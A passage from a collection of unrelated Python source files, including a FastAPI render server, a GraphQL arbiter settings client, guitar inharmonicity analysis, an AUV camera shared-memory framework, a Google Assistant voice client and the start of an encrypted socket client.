sock_send, sock_recv, dict(socket.query_params)
)
except WebSocketDisconnect as error:
logger.info(f"WebSocket disconnect: {error.code}")
def _setup_static_files(self, config: Config, app: FastAPI) -> None:
# This really should be added to the APIRouter, but there's a bug in FastAPI
# BUG: https://github.com/tiangolo/fastapi/issues/1469
url_prefix = config["url_prefix"]
if config["serve_static_files"]:
app.mount(
f"{url_prefix}/client",
StaticFiles(
directory=str(IDOM_CLIENT_BUILD_DIR.get()),
html=True,
check_dir=True,
),
name="idom_static_files",
)
if config["redirect_root_to_index"]:
@app.route(f"{url_prefix}/")
def redirect_to_index(request: Request) -> RedirectResponse:
return RedirectResponse(
f"{url_prefix}/client/index.html?{request.query_params}"
)
def _run_application(
self,
config: Config,
app: FastAPI,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
self._server = UvicornServer(
UvicornConfig(app, host=host, port=port, loop="asyncio", *args, **kwargs)
)
_run_uvicorn_server(self._server)
def _run_application_in_thread(
self,
config: Config,
app: FastAPI,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
# uvicorn does the event loop setup for us
self._run_application(config, app, host, port, args, kwargs)
async def _run_dispatcher(
self,
send: SendCoroutine,
recv: RecvCoroutine,
params: Dict[str, Any],
) -> None:
async with self._make_dispatcher(params) as dispatcher:
await dispatcher.run(send, recv, None)
def _make_dispatcher(self, params: Dict[str, Any]) -> AbstractDispatcher:
return self._dispatcher_type(Layout(self._root_component_constructor(**params)))
class PerClientStateServer(FastApiRenderServer):
"""Each client view will have its own state."""
_dispatcher_type = SingleViewDispatcher
class SharedClientStateServer(FastApiRenderServer):
"""All connected client views will have shared state."""
_dispatcher_type = SharedViewDispatcher
_dispatcher: SharedViewDispatcher
def _setup_application(self, config: Config, app: FastAPI) -> None:
app.on_event("startup")(self._activate_dispatcher)
app.on_event("shutdown")(self._deactivate_dispatcher)
super()._setup_application(config, app)
async def _activate_dispatcher(self) -> None:
self._dispatcher = cast(SharedViewDispatcher, self._make_dispatcher({}))
await self._dispatcher.start()
async def _deactivate_dispatcher(self) -> None: # pragma: no cover
# this doesn't seem to get triggered during testing for some reason
await self._dispatcher.stop()
async def _run_dispatcher(
self,
send: SendCoroutine,
recv: RecvCoroutine,
params: Dict[str, Any],
) -> None:
if params:
msg = f"SharedClientState server does not support per-client view parameters {params}"
raise ValueError(msg)
await self._dispatcher.run(send, recv, uuid.uuid4().hex, join=True)
def _run_uvicorn_server(server: UvicornServer) -> None:
# The following was copied from the uvicorn source with minimal modification. We
# shouldn't need to do this, but unfortunately there's no easy way to gain access to
# the server instance so you can stop it.
# BUG: https://github.com/encode/uvicorn/issues/742
config = server.config
if (config.reload or config.workers > 1) and not isinstance(
server.config.app, str
): # pragma: no cover
logger = logging.getLogger("uvicorn.error")
logger.warning(
"You must pass the application as an import string to enable 'reload' or "
"'workers'."
)
sys.exit(1)
if config.should_reload: # pragma: no cover
sock = config.bind_socket()
supervisor = ChangeReload(config, target=server.run, sockets=[sock])
supervisor.run()
elif config.workers > 1: # pragma: no cover
sock = config.bind_socket()
supervisor = Multiprocess(config, target=server.run, sockets=[sock])
supervisor.run()
else:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
server.run()
|
settings.py | import sys
from network import getSocket, serialNumber
from signal import pause
from time import sleep
from threading import Thread
#
# NOTE: it is intentional that we only have one zone per arbiter
# While it is possible to have the arbiter control multiple
# emitters, which indeed it will for some situations,
# having multiple zone control would make game configuration harder
# and also we want to avoid laying tons of wiring just to save on
# 15 dollars of additional hardware.
#
def callback(_id, data):
print(id)
print(data)
def updateChannel(name, totemId, status, type):
try:
ws = getSocket()
query = """
mutation update_arbiter_channel($arbiterId: ID!, $name: String!,
$type: ArbiterChannelType, $status: ArbiterChannelStatus, $totemId: ID) {
update_arbiter_channel(arbiterId: $arbiterId, name: $name, type: $type,
status: $status, totemId: $totemId) {
id
}
}
"""
ws.query(query, variables={
'arbiterId': serialNumber,
'name': name,
'totemId': totemId,
'status': status,
'type': type,
} )
except:
type, value, traceback = sys.exc_info()
print('Error opening %s: %s' % (value.filename, value.strerror))
print("ERROR: Unable to update channel with overmind")
def registerArbiter():
try:
ws = getSocket()
query = """
mutation register_arbiter_settings($id: ID!) {
register_arbiter_settings(id: $id) {
id
zoneType
}
}
"""
ws.query(query, variables={'id': serialNumber})
except:
type, value, traceback = sys.exc_info()
print('Error opening %s: %s' % (value.filename, value.strerror))
print("ERROR: Unable to register arbiter with overmind")
def subscribeSettings():
def monitor():
while(True):
print("Settings - Connecting to Overmind")
ws = None
try:
ws = getSocket()
query = """
subscription ArbiterSettingsUpdated($id: ID!) {
arbiter_settings_updated(id: $id) {
id
zoneType
}
}
"""
ws.subscribe(query,\
variables={'id': serialNumber},\
callback=callback)
print("Settings - Connected to Overmind")
# block this thread and do nothing unless the connection
# is lost
while(True):
# we are reaching into the underlying implementation here.
# this is cause the graphql library doesn't have an api
# to see if it's died or not.
if not ws._connection.connected:
raise Exception("Settings - Lost connection with Overmind");
sleep(1)
except:
print("ERROR: Unable get settings from overmind, is it online?")
finally:
if ws != None:
ws.close()
# retry every 5 seconds
sleep(5)
print("Settings - Re-connecting to Overmind")
thread = Thread(target=monitor)
thread.start()
|
n_tonos.py | import jams
from pathlib import Path
import matplotlib.pyplot as plt
import itertools
import numpy as np
import configparser
import os, sys
import argparse
from GuitarTrain import GuitarSetTrainWrapper
import threading
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
cur_path = Path(BASE_PATH + '/src/')
sys.path.append(str(cur_path))
from track_class import *
from Inharmonic_Detector import *
from inharmonic_Analysis import *
from constants_parser import Constants
import genetic
from helper import listen_to_the_intance
import statistics
import warnings
warnings.filterwarnings("ignore")
from GuitarSetTest import read_tablature_from_GuitarSet
import pickle
def get_annos_for_separate_strings(data, annotation_name, constants : Constants):
"""function that loads annotation and audio file and returns instances"""
annotations = read_tablature_from_GuitarSet(annotation_name, constants)
tups = [(x.onset, x.fundamental, 6) for x in annotations.tablature.tablature]
tablature = Tablature(tups, data, constants)
track_instance = TrackInstance(tablature, data, constants)
return track_instance, annotations
def compute_track_betas(track_instance : TrackInstance, annotations : Annotations, constants : Constants, StrBetaObj, channel):
global betas
global median_betas
def close_event(): # https://stackoverflow.com/questions/30364770/how-to-set-timeout-to-pyplot-show-in-matplotlib
plt.close() #timer calls this function after 3 seconds and closes the window
"""Inharmonic prediction of tablature for eachstring/channel separately """
for tab_instance, annos_instance in zip(track_instance.tablature.tablature, annotations.tablature.tablature):
if annos_instance.string!=channel:
continue
ToolBoxObj = ToolBox(partial_tracking_func=compute_partials, inharmonicity_compute_func=compute_inharmonicity, partial_func_args=[constants.no_of_partials, tab_instance.fundamental/2, constants, StrBetaObj], inharmonic_func_args=[])
note_instance = NoteInstance(tab_instance.fundamental, tab_instance.onset, tab_instance.note_audio, ToolBoxObj, track_instance.sampling_rate, constants)
Inharmonic_Detector.DetectString(note_instance, StrBetaObj, constants.betafunc, constants)
tab_instance.string = note_instance.string # predicted string
if note_instance.string!=6:
# print("found!!")
tab_instance.fret = Inharmonic_Detector.hz_to_midi(note_instance.fundamental) - constants.tuning[note_instance.string]
betas[annos_instance.string,tab_instance.fret].append(note_instance.beta)
if constants.plot:
x = threading.Thread(target=listen_to_the_intance, args=(tab_instance.note_audio,))
x.start()
fig = plt.figure(figsize=(15, 10))
timer = fig.canvas.new_timer(interval = 3000) #creating a timer object and setting an interval of 3000 milliseconds
timer.add_callback(close_event)
ax1 = fig.add_subplot(2, 1, 1)
ax2 = fig.add_subplot(2, 1, 2)
peak_freqs = [partial.frequency for partial in note_instance.partials]
peaks_idx = [partial.peak_idx for partial in note_instance.partials]
note_instance.plot_partial_deviations(lim=30, res=note_instance.abc, ax=ax1, note_instance=note_instance, annos_instance=annos_instance, tab_instance=tab_instance) #, peaks_idx=Peaks_Idx)
note_instance.plot_DFT(peak_freqs, peaks_idx, lim=30, ax=ax2)
timer.start()
plt.show()
def compute_all_betas(constants : Constants, StrBetaObj):
""" function that runs tests on the jams files mentioned in the given file
and plots the confusion matrixes for both the genetic and inharmonic results."""
print()
print("Starting computation...")
lines = os.listdir(constants.dataset_names_path+'/data/audio')
for count, name in enumerate(lines):
if '_hex_cln.' not in name:
continue
if '_solo' not in name:
continue
print(name)
track_name = name
name = name.split('.')[0]
name = name[:-8] + '.jams'
print(name, count,'/',len(lines))
""" load 6-channel track and annotations"""
track_name = Path(constants.track_path + track_name)
annotation_name = Path(constants.annos_path + name)
multi_channel_data, _ = librosa.core.load(track_name, constants.sampling_rate, mono=False) # _ cause dont need to reassign sampling rate
""" loop over each channel in order to compute betas for separate and debleeded note instances """
for channel in range(6):
data = multi_channel_data[channel,:]
try:
track_instance, annotations = get_annos_for_separate_strings(data, annotation_name, constants)
compute_track_betas(track_instance, annotations, constants, StrBetaObj, channel)
except Exception as e:
print(e)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config_path', type=str)
parser.add_argument('workspace_folder', type=str)
parser.add_argument('-plot', action='store_true')
parser.add_argument('-compute', action='store_true')
parser.add_argument('-train', action='store_true')
args = parser.parse_args()
try:
constants = Constants(args.config_path, args.workspace_folder)
except Exception as e:
print(e)
try:
os.mkdir('./results')
except Exception as e:
print('GootToKnow:', e)
# HARDWIRE CONSTANTS
constants.plot = args.plot
print('Check if you are OK with certain important configuration constants:')
print('****************************')
print('train_mode:', constants.train_mode)
print('train_frets:', constants.train_frets)
print('polyfit:', constants.polyfit)
print('dataset_names_path:', constants.dataset_names_path)
print('****************************')
print()
StringNames = ['E', 'A', 'D', 'G', 'B', 'e']
betas = np.array([[None]*20]*6)
for s in range(6):
for n in range(20):
betas[s,n] = []
median_betas = np.array([[None]*20]*6)
if args.train:
StrBetaObj = GuitarSetTrainWrapper(constants)
else:
with open('data/train/StrBetaObj.pickle', 'rb') as file:
StrBetaObj = pickle.load(file)
if args.compute:
compute_all_betas(constants, StrBetaObj)
for s in range(6):
for n in range(20):
if betas[s,n]: # not None
median_betas[s,n] = statistics.median(betas[s,n])
np.savez("./results/n_tonos.npz", median_betas=median_betas)
npzfile = np.load('./results/n_tonos.npz', allow_pickle=True) # allow_pickle is needed because dtype=object, since None elements exist.
median_betas = npzfile['median_betas']
nf=13
for s in range(6):
diff = np.log2(median_betas[s,:nf].astype(np.float64))-np.log2(median_betas[s,0].astype(np.float64))
plt.plot(range(nf), 6*diff, label=StringNames[s], linewidth=1.75, alpha=0.85)
plt.plot(range(nf+1), range(nf+1), label='y=x', linestyle='dashed', color='black')
plt.xticks(range(1,20))
plt.yticks(range(1,14))
plt.xlim(-0.1,20)
plt.ylim(-0.1,20)
plt.grid()
plt.xlabel('n')
plt.ylabel(r'$6 \cdot \log_2(\hat{\beta}_{s,med}(n)/\hat{\beta}_{s,med}(0))$')
plt.legend()
plt.savefig('./results/n_tonos.png', bbox_inches='tight')
plt.show() |
camera_message_framework.py | import struct
import threading
import time
import numpy as np
from collections import namedtuple, OrderedDict
from ctypes import POINTER, c_ubyte, c_uint32, c_uint64, c_char_p, c_voidp, c_ssize_t, c_bool, c_int32, addressof, Structure, create_string_buffer
from functools import reduce
import operator
from auv_python_helpers import load_library
# Return values of _lib.read_frame
FRAMEWORK_QUIT = 1
FRAMEWORK_DELETED = 2
class _Frame(Structure):
_fields_ = [('data', POINTER(c_ubyte)),
('last_frame', c_uint32),
('width', c_ssize_t),
('height', c_ssize_t),
('depth', c_ssize_t),
('acq_time', c_uint64)]
_lib_nothread = load_library('libauv-camera-message-framework.so')
_lib_nothread.create_message_framework_from_cstring.argtypes = (c_char_p, c_ssize_t)
_lib_nothread.create_message_framework_from_cstring.restype = c_voidp
_lib_nothread.access_message_framework_from_cstring.argtypes = (c_char_p,)
_lib_nothread.access_message_framework_from_cstring.restype = c_voidp
_lib_nothread.cleanup_message_framework.argtypes = (c_voidp,)
_lib_nothread.cleanup_message_framework.restype = None
_lib_nothread.kill_message_framework.argtypes = (c_voidp,)
_lib_nothread.kill_message_framework.restype = None
_lib_nothread.read_frame.argtypes = (c_voidp, c_voidp)
_lib_nothread.read_frame.restype = c_int32
_lib_nothread.write_frame.argtypes = (c_voidp, c_voidp, c_uint64,
c_ssize_t, c_ssize_t, c_ssize_t)
_lib_nothread.write_frame.restype = c_bool
_lib_nothread.get_buffer_size.argtypes = (c_voidp,)
_lib_nothread.get_buffer_size.restype = c_ssize_t
running = True
# if we're currently running in an eventlet context (i.e. from the GUI)
# use a proxy for lib. this makes lib calls run in a thread pool, instead
# of entirely blocking the eventlet cooperative threads
is_patched = 'eventlet' in threading.current_thread.__module__
if is_patched:
from vision import resizable_eventlet_tpool as tpool
tpool.setup()
_lib = tpool.Proxy(_lib_nothread)
else:
_lib = _lib_nothread
class ExistentialError(Exception):
pass
class StateError(Exception):
pass
# Structure that represents an accessor to a shared memory block. Creating an
# accessor will block until the shared memory block with the specified name is
# created
# An accessor has all of the same priviledges as a creator in terms of reading
# and writing frame
class Accessor:
def __init__(self, name):
self.name = name
self._framework = None
retrying = False
# loop until the framework actually exists
while running:
self._framework = _lib.access_message_framework_from_cstring(name.encode('utf8'))
if self._framework:
break
if not retrying:
print("Block with name {} does not exist! Waiting and retrying...".format(name))
retrying = True
time.sleep(0.5)
if retrying:
print("Found {}!".format(name))
if running:
self._setup_accessor()
def valid(self):
return self._framework
# convenience method for setting up accessor fields
# these aren't in the constructor because Creator will also want to use them
def _setup_accessor(self, framework_valid=True):
self._frame = _Frame()
self._array = None
self._last_frame = None
if framework_valid:
self.buffer_size = _lib.get_buffer_size(self._framework)
self.alive = True
def get_next_frame(self):
if not self.alive:
raise StateError('Accessor has already been cleaned up!')
frame = self._frame
ret = _lib.read_frame(addressof(frame), self._framework)
if ret != 0:
return ret
#self.cleanup()
#raise StateError('Accessor has already been cleaned up!')
shape = frame.height, frame.width, frame.depth
# don't recreate the array if we can avoid it, to mitigate numpy memory leak bug
if (self._array is None or
self._array.__array_interface__['data'][0] != addressof(frame.data.contents)):
self._array = np.ctypeslib.as_array(frame.data, shape)
elif (self._array.shape != shape and
reduce(operator.mul, self._array.shape) == reduce(operator.mul, shape)):
self._array = self._array.reshape(shape)
elif self._array.shape != shape:
self._array = np.ctypeslib.as_array(frame.data, shape)
self._last_frame = self._array, frame.acq_time
return self._last_frame
def get_last_frame(self):
if self._last_frame is None:
raise StateError()
return self._last_frame
def has_last_frame(self):
return self._last_frame is not None
# write a frame to the shared memory block, with a max dimension size of 3
# the frame must be at most this.buffer_size bytes
# acq_time is an int representing the time in miliseconds that the frame
# was acquired at
def write_frame(self, frame, acq_time):
if not self.alive:
raise StateError('Accessor has already been cleaned up!')
if len(frame.shape) == 1:
width, = frame.shape
depth = height = 1
elif len(frame.shape) == 2:
height, width = frame.shape
depth = 1
else:
height, width, depth = frame.shape
is_live = _lib_nothread.write_frame(self._framework, frame.ctypes.data, acq_time, width, height, depth)
#if not is_live:
# self.cleanup()
# raise StateError('Accessor has already been cleaned up!')
def unblock(self):
if self._framework is None:
return
_lib.kill_message_framework(self._framework)
def cleanup(self, kill=True):
if not self.alive:
return
self.alive = False
if self._framework is None:
return
_lib.kill_message_framework(self._framework)
_lib.cleanup_message_framework(self._framework)
self._framework = None
# A Creator is an accessor that first creates the framework before accessing it.
# It will raise an ExistentialError if the specified name already exists
class Creator(Accessor):
def __init__(self, name, max_size):
self.name = name
self._framework = _lib.create_message_framework_from_cstring(name.encode('utf8'), max_size)
self._setup_accessor(self._framework)
MAX_NAME_LENGTH = 100
MAX_OPTION_FORMAT_STR_LENGTH = 64
FORMAT_STR_FORMAT_STR = '{}s'.format(MAX_OPTION_FORMAT_STR_LENGTH)
class _OptionAccessor(Accessor):
def __init__(self, full_name):
super().__init__(full_name)
format_str, _ = self.get_next_frame()
self._setup_option_accessor(format_str)
def _setup_option_accessor(self, format_str):
num_zeros = MAX_OPTION_FORMAT_STR_LENGTH - len(format_str)
# append zeroes to the format string, so that it can be packed
if num_zeros > 0:
format_str = bytes(format_str + num_zeros*'\0', 'utf8')
self._format_str = format_str
def get_next_frame(self):
res = super().get_next_frame()
if isinstance(res, int):
return res
frame, _ = res
self._last_frame = frame
return self.get_last_frame()
def get_last_frame(self):
if not self.has_last_frame():
raise StateError()
bstr = self._last_frame.tostring()
format_bstr = bstr[:MAX_OPTION_FORMAT_STR_LENGTH]
format_str, = struct.unpack_from(FORMAT_STR_FORMAT_STR, format_bstr)
value = struct.unpack_from(format_str, bstr[MAX_OPTION_FORMAT_STR_LENGTH:])
format_str = _char_arr_to_str(format_str).decode('utf8')
return format_str, value
def set_value(self, values):
byteify_tuple = lambda v: bytes(v, 'utf8') if isinstance(v, str) else v
value_str = struct.pack(self._format_str, *map(byteify_tuple, values))
narr = np.fromstring(self._format_str + value_str, dtype=np.uint8)
self.write_frame(narr, int(time.time()*1000))
class _OptionCreator(_OptionAccessor, Creator):
def __init__(self, full_name, format_str):
Creator.__init__(self, full_name, MAX_OPTION_FORMAT_STR_LENGTH + struct.calcsize(format_str))
self._setup_option_accessor(format_str)
MAX_NUM_POSTED_IMAGES = 256
MAX_NUM_OPTIONS = 256
# Gui struct format:
# Number of images (ubyte)
# Number of options (ubyte)
# Location of images (MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES bytes)
# Location of options (MAX_NAME_LENGTH*MAX_NUM_OPTIONS bytes)
_gui_struct = struct.Struct('BB{}s{}s'.format(MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES,
MAX_NAME_LENGTH*MAX_NUM_OPTIONS))
# convenience method to remove null characters from the end of a string
def _char_arr_to_str(arr):
try:
first_null = arr.index(b'\0')
return arr[:first_null]
except Exception as e:
return arr
# convenience method to unpack {num} names from {arr}
def _unpack_names(arr, num):
lst = []
pos = 0
for _ in range(num):
string = _char_arr_to_str(arr[pos:pos+MAX_NAME_LENGTH])
lst.append(string)
pos += MAX_NAME_LENGTH
return lst
# convenience method to turn a string representing a gui_struct into a tuple
# consisting of (image_names, option_names)
def _gui_struct_to_gui_tuple(s):
num_images, num_options, im_arr, options_arr = _gui_struct.unpack(s)
utf8_lambda = lambda s: s.decode('utf8')
bytes_list_to_str_list = lambda l: list(map(utf8_lambda, l))
image_names = _unpack_names(im_arr, num_images)
option_names = _unpack_names(options_arr, num_options)
return bytes_list_to_str_list(image_names), bytes_list_to_str_list(option_names)
def _construct_gui_shm_name(module_name, value_name, is_option):
name = '{}_{}'.format(module_name, value_name)
if is_option:
name += '_option'
return name
# Accessor representing a module, containing utility functions for posted
# images, options, etc
class ModuleFrameworkAccessor(Accessor):
def __init__(self, module_name):
Accessor.__init__(self, 'module-' + module_name)
self.cmf_deletion_callback = None
self._setup_module_framework(module_name)
def _setup_module_framework(self, module_name):
self._lock = threading.RLock()
self._option_accessors = OrderedDict()
self._image_accessors = {}
self._image_observers = []
self._option_observers = []
self.ordered_image_names = []
self.ordered_option_names = []
self._module_name = module_name
self.threads = []
t = threading.Thread(target=self._observe_forever)
t.start()
self.threads.append(t)
def _watch_option(self, option_name, option):
# since an option consumes one of its own frames when it initializes
# itself, we need to notify all watchers of the first frame manually
if option.has_last_frame():
first_option_value = option.get_last_frame()
with self._lock:
for observer in self._option_observers:
observer(option_name, first_option_value)
while running and option_name in self._option_accessors:
try:
prev_value = option.get_last_frame()
except:
prev_value = None
next_value = option.get_next_frame()
if isinstance(next_value, int):
break
if prev_value == next_value:
continue
if option_name not in self._option_accessors:
break
time.sleep(0)
with self._lock:
for observer in self._option_observers:
observer(option_name, next_value)
time.sleep(0)
def _watch_image(self, image_name, image):
while running and image_name in self._image_accessors:
res = image.get_next_frame()
if isinstance(res, int):
break
next_value, acq_time = res
if image_name not in self._image_accessors:
break
time.sleep(0)
with self._lock:
for observer in self._image_observers:
observer(image_name, (next_value, acq_time))
time.sleep(0)
def _observe_forever(self):
while running:
res = self.get_next_frame()
if isinstance(res, int):
if res == FRAMEWORK_DELETED and self.cmf_deletion_callback is not None:
self.cmf_deletion_callback()
break
frame, _ = res
bstr = frame.tostring()
image_names, option_names = _gui_struct_to_gui_tuple(bstr)
self.ordered_image_names = image_names
self.ordered_option_names = option_names
# TODO store image and option indices with Accessor
def update_watchers(names, accessor_dict, accessor_constructor,
is_option):
# dict_cp tracks the names we have _not_ seen, to be removed
# after we add new names
dict_cp = accessor_dict.copy()
for name in names:
if not name:
continue
if name not in accessor_dict:
accessor_name = _construct_gui_shm_name(self._module_name,
name, is_option)
accessor = accessor_constructor(accessor_name)
accessor_dict[name] = accessor
if is_option:
target=self._watch_option
else:
target=self._watch_image
t = threading.Thread(target=target, args=(name, accessor))
t.start()
else:
del dict_cp[name]
for name_to_del in dict_cp:
# this is plagues by timing issues with creators - e.g. the
# creator will create two options, but this read will only
# pick up the first, deleting the second from the dict.
# This might be fixable with better usage of locks (how?),
# but for now I'm commenting out the deletion, which would
# not give us any notable performance increase anyway
#del accessor_dict[name_to_del]
pass
time.sleep(0)
with self._lock:
update_watchers(image_names, self._image_accessors, Accessor,
False)
update_watchers(option_names, self._option_accessors,
_OptionAccessor, True)
time.sleep(0)
def _register_observer(self, observer, observer_list, accessors_dict,
notify_with_current_values):
time.sleep(0)
with self._lock:
observer_list.append(observer)
if notify_with_current_values:
for name in accessors_dict:
accessor = accessors_dict[name]
if not accessor.has_last_frame():
continue
last_accessor_value = accessor.get_last_frame()
observer(name, last_accessor_value)
def register_image_observer(self, image_observer,
notify_with_current_values=True):
self._register_observer(image_observer, self._image_observers,
self._image_accessors, notify_with_current_values)
def register_option_observer(self, option_observer,
notify_with_current_values=True):
self._register_observer(option_observer, self._option_observers,
self._option_accessors, notify_with_current_values)
def write_image(self, image_name, image, acq_time):
self._image_accessors[image_name].write_frame(image, acq_time)
def write_option(self, option_name, value):
self._option_accessors[option_name].set_value(value)
def get_option_values(self):
option_values = {}
for option_name in self._option_accessors:
#try:
option_values[option_name] = self._option_accessors[option_name].get_last_frame()
#except:
# continue
return option_values
def get_images(self):
images = {}
for image_name, accessor in self._image_accessors.items():
#try:
images[image_name] = accessor.get_last_frame()[0]
#except:
# continue
return images
def _get_all_CMFs(self):
return list(self._option_accessors.values()) + \
list(self._image_accessors.values())
def unblock(self):
for CMF in self._get_all_CMFs():
CMF.unblock()
super().unblock()
def register_cmf_deletion_callback(self, f):
self.cmf_deletion_callback = f
def _safe_key_wrapper(k):
def get(x):
try:
return k(x)
except:
return -1
return get
class ModuleFrameworkCreator(ModuleFrameworkAccessor, Creator):
def __init__(self, module_name):
Creator.__init__(self, 'module-' + module_name, _gui_struct.size)
self._setup_module_framework(module_name)
self._image_ordering = lambda x: x
self._option_ordering = lambda x: 0
def _update(self):
name_struct_gen = lambda name: '{{:\0<{}}}'.format(MAX_NAME_LENGTH).format(name)
image_keys = sorted(self._image_accessors.keys(), key=self._image_ordering)
image_names = map(name_struct_gen, image_keys)
option_keys = sorted(self._option_accessors.keys(), key=self._option_ordering)
option_names = map(name_struct_gen, option_keys)
image_name_str = ''.join(image_names)
image_name_str += '\0'*(MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES - len(image_name_str))
option_name_str = ''.join(option_names)
option_name_str += '\0'*(MAX_NAME_LENGTH*MAX_NUM_OPTIONS - len(option_name_str))
frame = _gui_struct.pack(len(self._image_accessors),
len(self._option_accessors),
image_name_str.encode('utf8'),
option_name_str.encode('utf8'))
self.write_frame(np.fromstring(frame, dtype=np.uint8), int(time.time() * 1000))
def create_option(self, option_name, format_str):
if option_name not in self._option_accessors:
with self._lock:
name = _construct_gui_shm_name(self._module_name, option_name, True)
writer = _OptionCreator(name, format_str)
self._option_accessors[option_name] = writer
self._update()
t = threading.Thread(target=self._watch_option,
args=(option_name, writer))
t.start()
self.threads.append(t)
def create_image(self, image_name, image_buffer_size):
if image_name not in self._image_accessors:
with self._lock:
name = _construct_gui_shm_name(self._module_name, image_name, False)
writer = Creator(name, image_buffer_size)
self._image_accessors[image_name] = writer
self._update()
t = threading.Thread(target=self._watch_image,
args=(image_name, writer))
t.start()
self.threads.append(t)
def cleanup(self):
self.unblock()
for thread in self.threads:
thread.join()
for CMF in self._get_all_CMFs():
CMF.cleanup()
super().cleanup()
def set_image_ordering(self, key_function):
self._image_ordering = _safe_key_wrapper(key_function)
self._update()
def set_option_ordering(self, key_function):
self._option_ordering = _safe_key_wrapper(key_function)
self._update()
|
google_voice.py | #!/usr/bin/env python
# google voice client, start listen voice input by google assistant and publish text to ros node
# Copyright (C) 2018 Elemtary Robotics Inc.
from __future__ import print_function
import argparse
import os.path
import json
import google.auth.transport.requests
import google.oauth2.credentials
from google.assistant.library import Assistant
from google.assistant.library.event import EventType
from google.assistant.library.file_helpers import existing_file
from multiprocessing import Process, Queue
import os
import subprocess
from atom import Element
from atom.messages import Response
class Sounds(object):
"""
Class that plays all sounds
"""
def __init__(self):
self.sounds = {}
def load_sound(self, name, filename):
self.sounds[name] = filename
def play_sound(self, name):
if name in self.sounds:
subprocess.call(["play", self.sounds[name]])
print ("Played sound {}".format(name))
return True
else:
print("Sound {} not supported!".format(name))
return False
class SoundElement(object):
"""
Element for playing back sounds
"""
def __init__(self, queue):
self.q = queue
def command_cb(self, data):
self.q.put(data.decode('ascii'))
return Response(data="Success")
def sound_element_thread(sound_queue):
"""
Registers all of the sound playback commands for this element
and handles when they're called
"""
elem = Element("sound")
# Register our callback to play sounds
elem_class = SoundElement(sound_queue)
elem.command_add("play_sound", elem_class.command_cb)
elem.command_loop()
def sound_playback_thread(sound_queue):
"""
Load the sounds and handle the queue to play them
"""
sounds = Sounds()
sounds.load_sound("success", "/usr/local/share/sounds/success.wav")
sounds.load_sound("fail", "/usr/local/share/sounds/fail.wav")
sounds.load_sound("on_start", "/usr/local/share/sounds/on_conversation_start.wav")
# Loop, reading from the queue and playing sounds
while True:
sound = sound_queue.get()
sounds.play_sound(sound)
def process_event(event, assistant, element, sound_queue):
"""
Publishes the event on our data stream
"""
if event.type == EventType.ON_CONVERSATION_TURN_STARTED:
sound_queue.put("on_start")
# If speech finished, then we want to publish the string
if (event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED):
# Get the text and publish it
speech_text = event.args["text"]
# Write the entry
element.entry_write("string", {"data" : speech_text})
# Stop the conversation
assistant.stop_conversation()
# Always print the event
print(event)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--credentials', type=existing_file,
metavar='OAUTH2_CREDENTIALS_FILE',
default=os.path.join(
os.path.expanduser('~/.config'),
'google-oauthlib-tool',
'credentials.json'
),
help='Path to store and read OAuth2 credentials')
parser.add_argument('--device_model_id', type=str,
metavar='DEVICE_MODEL_ID', required=True,
help='The device model ID registered with Google')
parser.add_argument(
'-v',
'--version',
action='version',
version='%(prog)s ' +
Assistant.__version_str__())
args = parser.parse_args()
with open(args.credentials, 'r') as f:
credentials = google.oauth2.credentials.Credentials(token=None,
**json.load(f))
# Set up the sound thread
sound_queue = Queue()
sound_thread = Process(target=sound_playback_thread, args=(sound_queue,))
sound_thread.start()
# Set up the process that will play sounds for other processes. This
# is needed until we get a shared PulseAudio system up and running
# s.t. all elements can play their own sounds
sound_element = Process(target=sound_element_thread, args=(sound_queue,))
sound_element.start()
with Assistant(credentials, args.device_model_id) as assistant:
# Create our element
element = Element("voice")
# Start the assistant
events = assistant.start()
for event in events:
process_event(event, assistant, element, sound_queue)
if __name__ == '__main__':
main()
|
client.py | # Created by MysteryBlokHed on 21/02/2020.
import socket
from datetime import datetime
from math import ceil
from threading import Thread
from time import sleep
from .encryption import *
from .exceptions import *
from .status import *
HEADERSIZE = 16
class Client(object):
"""
`port: int` - The port that the server hosts Encwork on.
"""
def __init__(self, port: int=2006):
self._peer_public_key = None
self._target = None
self._latest_statuses = []
self.port = port
# Generate private key
self._latest_statuses.append(Status(1))
self._private_key = gen_private_key()
self._latest_statuses.append(Status(2))
# Set up socket
self._latest_statuses.append(Status(3, "client"))
self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._latest_statuses.append(Status(4, "client"))
def headerify(self, message: bytes):
"""Add the 16-byte header (specifies msg length) to the message"""
return bytes(f"{len(message):<{HEADERSIZE}}", "utf-8") + message
def statuses(self):
"""Streams statuses, such as messages and encryption status."""
while True:
if len(self._latest_statuses) > 0:
for status in self._latest_statuses:
yield status
self._latest_statuses = []
def _connection(self):
"""Internal function to connect to server and receive messages."""
while True:
try:
# Try to connect
self._latest_statuses.append(Status(12, self._target))
self._s.connect((self._target, self.port))
self._latest_statuses.append(Status(13, self._target))
# Send public key
self._latest_statuses.append(Status(10, self._target))
self._s.send(self.headerify(get_public_key_text(get_public_key(self._private_key))))
self._latest_statuses.append(Status(15, self._target))
# Receive public key
self._latest_statuses.append(Status(18, self._target))
try:
full_msg = b""
new_msg = True
while True:
msg = self._s.recv(16)
if new_msg:
msg_len = int(msg[:HEADERSIZE])
new_msg = False
full_msg += msg
if(len(full_msg) - HEADERSIZE == msg_len):
# Save the public key
self._peer_public_key = full_msg[HEADERSIZE:]
self._latest_statuses.append(Status(11, self._target))
cont = True
break
except Exception as e:
self._latest_statuses.append(Status(19, self._target))
cont = False
# Message receive loop
while cont:
full_msg = b""
try:
new_msg = True
while True:
msg = self._s.recv(16)
if new_msg:
msg_len = int(msg[:HEADERSIZE])
new_msg = False
full_msg += msg
if(len(full_msg) - HEADERSIZE == msg_len):
self._latest_statuses.append(Status(7, self._target))
# Decrypt length and convert to int
full_msg_len = int(decrypt(full_msg[HEADERSIZE:], self._private_key))
actual_full_message = []
# Get all parts of message
for i in range(full_msg_len):
full_msg = b""
try:
new_msg = True
while True:
msg = self._s.recv(16)
if new_msg:
